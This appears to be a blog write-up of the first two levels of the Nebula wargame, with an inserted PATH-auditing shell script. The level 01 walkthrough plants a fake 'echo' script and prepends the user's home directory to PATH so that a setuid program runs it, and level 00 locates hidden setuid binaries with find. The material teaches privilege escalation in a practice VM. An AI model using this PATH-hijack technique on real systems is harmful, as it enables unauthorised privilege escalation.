"Whatever Pages"

Shell meta-variable

         Nebula 01 Agenda: “There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?”


level01@nebula:~$ /home/flag01/flag01
	and now what?

level01@nebula:~$ which sh
	/bin/sh

level01@nebula:~$ which getflag
	/bin/getflag

“which” is a Unix command used to identify the location of executables. A Unix shell is a command-line interpreter that provides a traditional user interface for the Unix operating system. According to the wiki definition, “env” is used either to print a list of environment variables or to run another utility in an altered environment without having to modify the currently existing environment. env finds the utility it runs by searching the directories listed in PATH, in order.

That’s exactly what we need: replace echo with our own script.

level01@nebula:~$ cat > ./echo
	#!/bin/sh
	/bin/getflag;

At the end of the input, press “Ctrl+d”. TL;DR: it is just a signal saying that this is the end of a text stream. As a result, the “echo” script is created in the home directory.

  • “cat” is a standard Unix utility that outputs the contents of a specific file and can be used to concatenate and list files.
  • The “>” symbol means standard output redirection.
  • The dot (“.”) symbol represents the current directory (in our case, the level01 user’s home, “/home/level01”).
  • The “#!” is called a shebang and tells the parent shell which interpreter should be used to execute the script.

level01@nebula:~$ chmod +x echo

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ /home/flag01/flag01
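
From the defender's side, the same lookup can be audited. The script below is an added example, not part of the original post: it walks a PATH string in order, the way env does, and reports when a command name would resolve outside a trusted set of directories. The names `audit_path` and `is_trusted`, and the `TRUSTED_DIRS` list (taken from the PATH printed above), are assumptions.

```sh
#!/bin/sh
# Added example: audit how a bare command name resolves through PATH.
# TRUSTED_DIRS is an assumption taken from the default PATH printed in the post.
TRUSTED_DIRS="/usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin"

# is_trusted DIR: succeed if DIR (ignoring one trailing slash) is in TRUSTED_DIRS.
is_trusted() {
    d=${1%/}
    for t in $TRUSTED_DIRS; do
        if [ "$d" = "$t" ]; then return 0; fi
    done
    return 1
}

# audit_path NAME PATHSTRING
# Walks PATHSTRING left to right, as env and execvp do, prints one finding per
# line, and returns 1 if anything risky was found.
audit_path() {
    name=$1; rc=0; hit=
    old_ifs=$IFS; IFS=:; set -f
    set -- $2                      # split the PATH string on ':'
    IFS=$old_ifs; set +f
    for dir in "$@"; do
        case $dir in
            /*) ;;
            *)  echo "RISK relative or empty entry: '$dir'"; rc=1
                [ -n "$dir" ] || dir=. ;;   # an empty entry means the current directory
        esac
        # Only the first executable match is the one that would actually run.
        if [ -z "$hit" ] && [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            hit=$dir/$name
            if is_trusted "$dir"; then
                echo "OK $name resolves to $hit"
            else
                echo "RISK $name resolves to $hit, outside the trusted directories"
                rc=1
            fi
        fi
    done
    if [ -z "$hit" ]; then echo "NOTE $name not found in PATH"; fi
    return $rc
}

# Usage: sh audit_path.sh echo "$PATH"
if [ "$#" -ge 2 ]; then audit_path "$1" "$2"; fi
```

A privileged program avoids the problem altogether by calling helpers by absolute path and setting PATH itself instead of inheriting it from the caller.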


Suspicious directories

         Nebula 00 Agenda: “This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in/for suspicious looking directories.”

To suppress all the “permission denied” messages from “find”, we can redirect standard error from the screen to a file (for example, the special file /dev/null) so that the error messages never appear on the screen. For more details, see the man utility.

$ find / -user flag00 2>/dev/null

	/bin/.../flag00
	/home/flag00
	/home/flag00/.bash_logout
	/home/flag00/.bashrc
	/home/flag00/.profile
	/rofs/bin/.../flag00
	/rofs/home/flag00
	/rofs/home/flag00/.bash_logout
	/rofs/home/flag00/.bashrc
	/rofs/home/flag00/.profile

It’s easy to notice those “suspicious looking directories”. By the way, “rofs” (if you noticed it and are intrigued) is a read-only filesystem that allows creating a read-only mountpoint of a read-write directory on the system (or at least something similar =)). However, it doesn’t matter here.

$ ls -l /bin/.../flag00
	-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

Finally, executing “/bin/.../flag00” gives us the hint we wanted. Executing the “getflag” file is therefore our general purpose at each level.

PS. some useful links:

If you’re looking for something fun-filled and aimed at absolute beginners, you can try the wargame offered by the OverTheWire community.

CTF game

        Exploit-Exercises resource provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues.

Here I will try to periodically publish and update my subjective solutions and views on these issues. I have no assumptions about how long it will take until I have had enough, but let’s get going (with Nebula, an ideal place for people new to Linux exploitation =)).

My thoughts start here
